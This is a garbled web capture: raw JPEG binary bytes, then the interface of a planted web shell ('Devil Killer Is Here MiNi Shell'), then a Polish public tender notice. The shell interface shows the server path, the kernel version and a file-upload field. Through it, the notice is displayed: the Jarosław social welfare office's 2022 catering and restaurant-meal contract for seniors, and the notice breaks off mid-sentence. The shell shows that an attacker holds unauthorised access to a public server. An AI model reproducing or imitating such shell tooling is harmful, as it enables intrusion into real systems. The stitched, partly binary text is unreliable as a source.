JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20211213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20211213/0031238501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi restauracyjnej w 2022r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W JAROSŁAWIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650129377</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mops@mops.jaroslaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://jaroslaw.naszops.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi restauracyjnej w 2022r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5832221c-5c12-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00312385</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_jaroslaw</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a)	Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”<br/>W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>b)	Zamawiający, określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b.	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c.	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d.	włączona obsługa JavaScript,<br/>e.	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f.	Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g.	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/><br/>c)	Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>•	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>•	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>-	.zip <br/>-	7Z<br/>•	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>•	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>2.	Za datę przekazania Oferty, oświadczenia, o którym mowa w art. 125 ust. 1 uPzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę Zakupową w pozostałych przypadkach - mail.<br/>3.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniem dot. środków komunikacji elektronicznej.<br/>4.	Zamawiający informuje, że zgodnie z art. 284 ust. 6 uPzp treść zapytań wraz z wyjaśnieniami (bez ujawnienia źródła zapytania) udostępni na stronie internetowej prowadzonego postępowania. Tym samym wszelkie informacje przekazywane Wykonawcom stanowią integralną część specyfikacji warunków zamówienia i dotyczą wszystkich Wykonawców biorących udział w ww. postępowaniu. Wykonawca jest zobowiązany złożyć ofertę uwzględniającą wszelkie zmiany i wyjaśnienia zawarte w Informacjach dla Wykonawców.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/um_jaroslaw</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPS.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 Usługa cateringowa<br/><br/>1. Świadczenie usług polegających na przygotowywaniu oraz dostarczaniu jednodaniowych gorących posiłków uczestnikom Klubu Senior+ w Jarosławiu, ul. 3-go Maja 48, Klubu Senior+ w Jarosławiu, os. Jagiellonów 1, Dziennego Domu Senior+ w Jarosławiu, <br/>ul. Dolnoleżajska 16 oraz Dziennego Domu Senior + w Jarosławiu, Pl. A. Mickiewicza 18,<br/>2. Przedmiot zamówienia<br/>Nazwy i kody wg wspólnego słownika zamówień (CPV):<br/>CPV: 55321000- 6 - usługi przygotowywania posiłków,<br/>CPV: 55520000-1 - usługi dostarczania posiłków<br/>1) Przedmiotem zamówienia jest świadczenie usługi w okresie od 03 stycznia 2022 r. <br/>do 31 grudnia 2022 r. w dni od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy i wyjazdów zorganizowanych uczestników, polegającej na przygotowaniu oraz dostarczaniu transportem Wykonawcy do miejsca wskazanego przez zamawiającego na terenie Gminy Miejskiej Jarosław, 11 610 gorących posiłków jednodaniowych uczestnikom:<br/>a) Klubu Senior+ w Jarosławiu, ul. 3-go Maja 48 (3 600 posiłków - w dni od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy i wyjazdów zorganizowanych),<br/>b) Klubu Senior+ w Jarosławiu, os. Jagiellonów 1 (2 250 posiłków - 3 x w tygodniu <br/>z wyłączeniem wyjazdów zorganizowanych ),<br/>c) Dziennego Domu Senior+ w Jarosławiu, ul. Dolnoleżajska 16 (2 880 posiłków - <br/>3 x w tygodniu z wyłączeniem wyjazdów zorganizowanych ),<br/>d) Dziennego Domu Senior+ w Jarosławiu, Pl. A. Mickiewicza 18 (2 880 posiłków - <br/>3 x w tygodniu z wyłączeniem wyjazdów zorganizowanych), (możliwość dostawy do miejsca zamieszkania uczestników w przypadku zawieszenia działalności lub wprowadzenia <br/>w placówkach ograniczeń organizacyjnych - działania alternatywne).<br/>Przewiduje się, że szacunkowy zakres usług będzie obejmował w skali tygodnia przygotowanie i dostarczenie 223 posiłków w naczyniach jednorazowego użytku. Ze względu na specyfikę zamówienia faktyczna liczba zamawianych posiłków może ulec zmniejszeniu w związku z frekwencją osób korzystających z tej formy pomocy. Z racji zmniejszenia liczby wydawanych posiłków Wykonawcy nie przysługują roszczenia względem Zamawiającego.<br/>Zamawiający zastrzega, że nie będzie ponosił żadnej odpowiedzialności, jeżeli tylko część <br/>z gorących posiłków będzie zrealizowana, a Wykonawca nie będzie miał w tym zakresie żadnych roszczeń do Zamawiającego. Zamawiający zapłaci tylko za faktycznie dostarczone ilości gorących posiłków.<br/>Gorący posiłek jednodaniowy składał się będzie z:<br/>a) 0,5 l zupy, 300 g pieczywa oraz wkładki mięsnej tj. 150-200 g albo<br/>b) drugiego dania składającego się z porcji mięsa lub ryby, ziemniaków lub kaszy lub ryżu lub makaronu oraz surówki albo dań jarskich np. pierogów itp.<br/>Tygodniowy jadłospis powinien zawierać nie więcej niż 2 zupy z wkładką mięsną oraz pieczywem oraz nie mniej niż 3 drugie dania zawierające porcie mięsa lub ryby.<br/>Wykonawca dostarczał będzie w pierwszy dzień tygodnia jadłospis dekadowy, który będzie zawierał informacje o składzie potraw z wyszczególnieniem alergenów.<br/>Posiłki powinny być przygotowane zgodnie z zasadami sztuki kulinarnej, zasadami racjonalnego żywienia, być zróżnicowane tj. rodzaj potrawy nie może się powtarzać w okresie następujących po sobie l4 dni oraz spełniać wymogi sanitarne dla żywienia zbiorowego w szczególności posiłki powinny być przygotowane z zachowaniem obowiązujących norm żywieniowych i sanitarnych, zgodnie z przepisami ustawy z dnia <br/>25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2020 r. poz. 2021 z późn. zm.) oraz przepisami wykonawczymi wydanymi na podstawie tej ustawy.<br/>Posiłki przygotowywane będą na bazie pełnowartościowych produktów zakupionych przez Wykonawcę we własnym zakresie - z uwzględnieniem sezonowości ich występowania. Produkty powinny spełniać normy jakości produktów spożywczych, zgodnie <br/>z obowiązującymi przepisami prawnymi w tym zakresie, w tym ustawą z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia oraz zgodnie z normami HACCP. <br/>Do przygotowywania posiłków nie mogą być wykorzystane produkty nieświeże, złej jakości oraz produkty wysoko przetworzone np. zupy w proszku.<br/>Dostarczane posiłki nie mogą być przygotowane wcześniej niż w dniu ich dostarczenia, muszą być świeże, dobrej jakości, posiadać odpowiednie walory smakowe i estetyczne oraz właściwą temperaturę.<br/>Dostarczanie posiłków będzie się odbywało w dni od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy i wyjazdów zorganizowanych uczestników do miejsca wskazanego przez Zamawiającego w godz. od 11.00 do 14.00.<br/>Posiłki nie mogą być dostarczane wstecz - za dni poprzednie, ani z wyprzedzeniem - na dni następne.<br/>10) Miejsce realizacji zamówienia:<br/>a) Wykonawca zobowiązany jest do realizacji zamówienia w miejscu wskazanym przez zamawiającego na terenie Gminy Miejskiej Jarosław. Miejscem dostawy będzie: Dzienny Dom ,,Senior+” w Jarosławiu, ul. Dolnoleżajska 16, Dzienny Dom ,,Senior+” w Jarosławiu, Pl. Mickiewicza 18, Klub Senior+ w Jarosławiu, ul. 3- go Maja 48 oraz Klub Senior+ w Jarosławiu, os. Jagiellonów 1 ewentualnie miejsce zamieszkania uczestników w przypadku zawieszenia działalności),<br/>b) Wykonawca zobowiązany jest do ponoszenia odpowiedzialności prawnej i materialnej wobec organów kontroli (stacji sanitarno - epidemiologicznej, PIP, BHP) w zakresie wykonywanej usługi, w tym m.in. w zakresie jakości produktów i przygotowania posiłków <br/>w zakresie wymagań higieniczno - sanitarnych.<br/>ll)Zamawiający nie ponosi odpowiedzialności za żadne szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/>_ Termin realizacji zamówienia: od 03 Stycznia 2022 r. do 31 grudnia 2022 r.<br/>_ Warunki płatności :<br/>l) Rozliczenia finansowe z Wykonawcą będą odbywały się w miesięcznych okresach<br/>rozliczeniowych na podstawie rozliczeń wydanych posiłków w danym miesiącu<br/>2) Wykonawca każdorazowo zobowiązuje się do wystawienia faktury VAT - oddzielnie za posiłki dostarczone do:<br/>- Dziennego Domu Senior+ przy ul. Dolnoleżajskiej 16,<br/>- Dziennego Domu Senior+ Pl. Mickiewiczal8,<br/>- Klubu Senior+, przy ul. 3- go Maja 48<br/>- Klubu Senior+, os. Jagiellonów 1 w ciągu 5 dni po zakończeniu miesiąca kalendarzowego, <br/>a w miesiącu grudniu 2022 r. do 15.12.2022 r.<br/>3) Rozliczenia finansowe z Wykonawcą odbywać się będą na podstawie wystawianej przez Wykonawcę faktury.<br/>4) Zamawiający zobowiązuje się do przekazywania należności za dostawy artykułów żywnościowych w ciągu 14 dni od otrzymania faktury VAT, przelewem na konto Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Usługa restauracyjna<br/><br/>Przedmiotem zamówienia jest świadczenie usługi restauracyjnej w okresie od 01.01.2022 r. do 31.12.2022 r. w dni od poniedziałku do soboty z wyłączeniem dni ustawowo wolnych od pracy, polegającej na przygotowywaniu oraz wydawaniu z możliwością konsumpcji w lokalu wyznaczonym przez Wykonawcę na terenie Gminy Miejskiej Jarosław 10 000 gorących posiłków jednodaniowych osobom, którym Miejski Ośrodek Pomocy Społecznej <br/>w Jarosławiu decyzją administracyjną przyzna tą formę pomocy. W przypadku, gdy <br/>w związku z obowiązywaniem stanu epidemii, stanu zagrożenia epidemicznego lub stanu nadzwyczajnego nie będzie możliwa konsumpcja w lokalu wyznaczonym przez Wykonawcę, Wykonawca będzie wydawał posiłki na wynos.<br/>Nazwy i kody wg wspólnego słownika zamówień (CPV): 55300000-3.<br/>Przewiduje się, że minimalny zakres usług będzie obejmował w skali 1 dnia przygotowanie <br/>i wydanie ok. 40 posiłków. Ze względu na specyfikę zamówienia faktyczna liczba wydanych posiłków może ulec zmianie +/- 15%.<br/>Posiłki wydawane będą sukcesywnie przez cały czas określony w ust 1.<br/>Ogólna liczba zakupionych posiłków uzależniona będzie od rzeczywistych potrzeb Zamawiającego. Liczba sporządzonych i wydanych gorących posiłków może ulec zmianie ze względu na specyfikę zamówienia, którą cechuje zmienność potrzeb świadczeniobiorców Miejskiego Ośrodka Pomocy Społecznej w Jarosławiu. Zamawiający zastrzega, że nie będzie ponosił żadnej odpowiedzialności, jeżeli tylko część z gorących posiłków będzie zrealizowana, a Wykonawca nie będzie miał w tym zakresie żadnych roszczeń do Zamawiającego. Zamawiający zapłaci tylko za faktycznie wydane ilości gorących posiłków.<br/>Gorący posiłek jednodaniowy składał się będzie z:<br/>1) 0,5 l zupy, 300 g pieczywa oraz wkładki mięsnej tj. 150-200 g albo<br/>2) drugiego dania składającego się z porcji mięsa lub ryby, ziemniaków lub kaszy lub ryżu lub makaronu oraz surówki albo dań jarskich np. pierogów itp.<br/>Tygodniowy jadłospis powinien zawierać nie więcej niż 2 zupy z wkładką mięsną oraz pieczywem oraz nie mniej niż 3 drugie dania zawierające porcję mięsa lub ryby.<br/>Posiłki powinny być przygotowane zgodnie z zasadami sztuki kulinarnej, zasadami racjonalnego żywienia, być zróżnicowane tj. rodzaj potrawy nie może się powtarzać <br/>w okresie następujących po sobie 14 dni oraz spełniać wymogi sanitarne dla żywienia zbiorowego w szczególności posiłki powinny być przygotowane z zachowaniem obowiązujących norm żywieniowych i sanitarnych, zgodnie z przepisami ustawy z dnia <br/>25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2020 r. poz. 2021 z późn. zm.) oraz przepisami wykonawczymi wydanymi na podstawie tej ustawy.<br/>Posiłki przygotowywane będą na bazie pełnowartościowych produktów zakupionych przez Wykonawcę we własnym zakresie - z uwzględnieniem sezonowości ich występowania. Produkty powinny spełniać normy jakości produktów spożywczych, zgodnie <br/>z obowiązującymi przepisami prawnymi w tym zakresie, w tym ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia oraz zgodnie 2 normami HACCP.<br/>Do przygotowywania posiłków nie mogą być wykorzystane produkty nieświeże, złej jakości oraz produkty wysoko przetworzone np. zupy w proszku. Wydawane posiłki nie mogą być przygotowane wcześniej niż w dniu ich wydania, muszą być świeże, dobrej jakości, posiadać odpowiednie walory smakowe i estetyczne oraz właściwą temperaturę. <br/>Wydawanie posiłków będzie się odbywało w dni od poniedziałku do soboty z wyłączeniem dni ustawowo wolnych od pracy W lokalu Wykonawcy w godz. od 12.00<br/>do 15.00. Posiłki nie mogą być wydawane wstecz - za dni poprzednie, ani z wyprzedzeniem - na dni następne.<br/>Wykonawca zapewni w lokalu, o którym mowa w ust. 10 zaplecze sanitarne dla świadczeniobiorców Zamawiającego w postaci szatni oraz z wydzielonym pomieszczeniem <br/>z dostępem do bieżącej wody i toalety. Wykonawca powinien wykazać w ofercie, że dysponuje odpowiednią salą jadalną na terenie Gminy Miejskiej Jarosław, posiadającą dostęp do bezpłatnego WC z umywalka, dopuszczoną na mocy decyzji<br/>właściwego organu do prowadzenia działalności gastronomicznej (zbiorowe żywienie) <br/>w miejscu przygotowywania oraz wydawania posiłków.<br/>Miejsce realizacji zamówienia:<br/>1) Wykonawca zobowiązany jest do realizacji zamówienia na terenie Gminy Miejskiej Jarosław w lokalu usytuowanym nie dalej niż 500 m od przystanku komunikacji miejskiej,<br/>2) Wykonawca zapewni odpowiednie warunki lokalowe (miejsca siedzące przy stole), umożliwiające spożycie posiłku w tym samym czasie dla minimum 30 osób,<br/>3) Wykonawca zobowiązany jest do ponoszenia odpowiedzialności prawnej i materialnej wobec organów kontroli (stacji sanitarno - epidemiologicznej, PIP, BHP) w 